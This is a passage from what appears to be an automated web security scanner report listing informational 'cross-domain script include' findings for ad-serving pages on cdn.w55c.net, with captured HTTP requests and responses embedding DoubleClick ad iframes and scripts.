Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6967

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.13;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.13;abr=!ie;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1?">
</SCRIPT>
...[SNIP]...

24.40. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RDMd2Pp56_1855871382.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzNjM0fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgxNTk5&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRALQAI-hAK5XtJGKsHuhilbCHDocZSZdL3wA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=381&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676544&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658544577&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658544581&frm=1&adk=2614322350&ga_vid=1063735003.1303658545&ga_sid=1303658545&ga_hid=467631587&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895132&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:22:23 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:12:52 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 07 Mar 2011 14:26:38 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 836

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzNjM0fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgxNTk5?">
</SCRIPT>
...[SNIP]...

24.41. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RDMd2Pp56_1855871382.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDNGREUwMDBBMzc5ODBBRTU3RUNEMkE2ODc2QjR8R0YyY1FkMmI1VXwxMzAzNjU4NDY0NzM4fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8Mjk5Njc1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_3gAKN5gK5X7NKmh2tAAE_twCii5ctWtVYQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDNGREUwMDBBMzc5ODBBRTU3RUNEMkE2ODc2QjQ&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=299&zc=NzUyMDc&v=0&s=http%3A%2F%2F& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658465628&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658465633&frm=1&adk=2614322350&ga_vid=256767513.1303658466&ga_sid=1303658466&ga_hid=375503836&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:26:07 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 07 Mar 2011 14:26:38 GMT
Date: Sun, 24 Apr 2011 15:24:49 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 836

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDNGREUwMDBBMzc5ODBBRTU3RUNEMkE2ODc2QjR8R0YyY1FkMmI1VXwxMzAzNjU4NDY0NzM4fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8Mjk5Njc1?">
</SCRIPT>
...[SNIP]...

24.42. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RDMd2Pp56_1855871382.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDQwODgwMDBEQTZGNTBBRTU4MEM5MjI4NzI3ODB8R0Z5UmlTRzhGNHwxMzAzNjU4NjM0OTIyfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgwNjEx&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAiAANpvUK5YDJIocngE1dSdpWpJDKZEirOQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwODgwMDBEQTZGNTBBRTU4MEM5MjI4NzI3ODA&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=380&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676635&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658635874&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658635885&frm=1&adk=2614322350&ga_vid=1031362686.1303658636&ga_sid=1303658636&ga_hid=1511491377&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:23:54 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 14:55:04 GMT
Pragma: no-cache
Accept-Ranges: bytes
Last-Modified: Mon, 07 Mar 2011 14:26:38 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 836

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwODgwMDBEQTZGNTBBRTU4MEM5MjI4NzI3ODB8R0Z5UmlTRzhGNHwxMzAzNjU4NjM0OTIyfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgwNjEx?">
</SCRIPT>
...[SNIP]...

24.43. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RDMd2Pp56_1855871382.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwNkIwMDBDMDc5MTBBRTU4MzQ4MUE0NzIwQjd8R0Y4akFtdlVzNnwxMzAzNjU4NjA1ODQzfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MjA0NTE1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAawAMB5EK5YNIGkcgtwSIa-YP3wHbrdXB1w&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwNkIwMDBDMDc5MTBBRTU4MzQ4MUE0NzIwQjc&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=204&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676606&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658606775&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658606780&frm=1&adk=2614322350&ga_vid=1570881348.1303658607&ga_sid=1303658607&ga_hid=1994203513&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:23:25 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:12:52 GMT
Pragma: no-cache
Accept-Ranges: bytes
Last-Modified: Mon, 07 Mar 2011 14:26:38 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 836

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwNkIwMDBDMDc5MTBBRTU4MzQ4MUE0NzIwQjd8R0Y4akFtdlVzNnwxMzAzNjU4NjA1ODQzfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MjA0NTE1?">
</SCRIPT>
...[SNIP]...

24.44. http://cdn.w55c.net/i/0RES95J3Zo_918427505.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RES95J3Zo_918427505.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0RES95J3Zo_918427505.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAHP6EK5X5HHeFjM058SIacGTDQNRf0Tg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZNQXp6YTk2dA&ciu=MFJFUzk1SjNabw&reqid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=866&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516462&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516467&frm=1&adk=2614322350&ga_vid=1758961832.1303658516&ga_sid=1303658516&ga_hid=2008436335&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:29:39 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 28 Feb 2011 21:20:22 GMT
Date: Sun, 24 Apr 2011 14:52:24 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1248

<IFRAME SRC="http://ad.doubleclick.net/adi/N4270.158901.DATAXU/B5279302.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279302.4;abr=!ie;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz?">
</SCRIPT>
...[SNIP]...

24.45. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0REyoPRMSz_696710848.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0REyoPRMSz_696710848.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAFoYUK5XeVIQpujIjD7cILBOkoQIpRdg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502354&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502359&frm=1&adk=513358139&ga_vid=2102368488.1303658502&ga_sid=1303658502&ga_hid=1386538034&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:21:40 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:19:55 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:04:45 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6961

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.16;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1?">
</SCRIPT>
...[SNIP]...

24.46. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0REyoPRMSz_696710848.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /i/0REyoPRMSz_696710848.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8NDIwNDQw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_-gAOCYEK5XdQI_RaDCZm9H-nfhLkah7veg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=420&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676493&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658493907&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658493914&frm=1&adk=513358139&ga_vid=1738821208.1303658494&ga_sid=1303658494&ga_hid=1857389626&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:26:07 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:04:45 GMT
Date: Sun, 24 Apr 2011 15:25:35 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6961

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8NDIwNDQw?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
